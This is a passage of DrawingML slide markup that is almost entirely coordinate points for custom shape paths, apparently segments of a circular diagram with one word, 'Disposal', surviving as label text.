                  <a:pt x="2887141" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891815" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2894927" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896476" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896476" y="1447927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2588620" y="5138673"/>
            <a:ext cx="112966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Disposal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663490" y="3773601"/>
            <a:ext cx="2896870" cy="2943225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="274002" y="703783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="237934" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85534" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9334" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1447927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9334" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85534" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237934" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52158" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="703783"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1146797" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099870" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053731" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008443" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964018" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920521" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="877989" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836447" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="795947" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756526" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718210" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681062" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645121" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610412" y="2357285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576973" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544855" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514096" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484733" y="2214054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456806" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430364" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405422" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382054" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360273" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340131" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321665" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304914" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289915" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276720" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265366" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222186" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232803" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245160" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259194" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274878" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292176" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311048" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331470" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353402" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="376809" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401650" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427913" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455536" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484492" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514756" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546277" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579043" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612990" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648106" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="684352" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721690" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760082" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="799503" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839901" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881253" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923531" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966685" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010691" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055509" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101102" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147445" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="226898"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1147445" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101102" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055509" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010691" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966685" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923531" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881253" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839901" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="799503" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760082" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721690" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="684352" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648106" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612990" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579043" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546277" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514756" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484492" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455536" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427913" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401650" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="376809" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353402" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331470" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311048" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292176" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274878" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259194" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245160" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232803" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222186" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265366" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276720" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289915" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304914" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321665" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340131" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360273" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382054" y="894029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405422" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430364" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456806" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484733" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514096" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544855" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576973" y="621855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610412" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645121" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681062" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718210" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756526" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="795947" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836447" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="877989" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920521" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964018" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008443" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053731" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099870" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1146797" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="226898"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2207069" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="2701874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2201634" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="242011"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2201634" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="242011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2207069" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="242011"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619756" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606560" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591562" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574810" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556345" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536202" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514422" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491054" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466111" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439670" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411742" y="2214054"/>
